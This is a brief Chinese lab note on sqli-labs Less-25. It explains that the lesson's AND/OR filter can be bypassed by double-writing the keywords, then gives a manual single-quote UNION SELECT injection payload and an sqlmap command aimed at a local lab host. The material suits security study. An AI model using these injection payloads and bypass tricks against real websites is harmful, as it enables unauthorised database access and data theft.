过滤了AND OR 使用的函数是 preg_replace 特点:只对值进行一次检测闭合方式为 单引号 '可以使用双写进行绕过 手工注入 ?id=0' union select 1,database(),user() --+ sqlmap自动化注入 sqlmap.py -u http://192.168.58.114:802/sqli-labs/Less-25/?id=2 --batch --dbs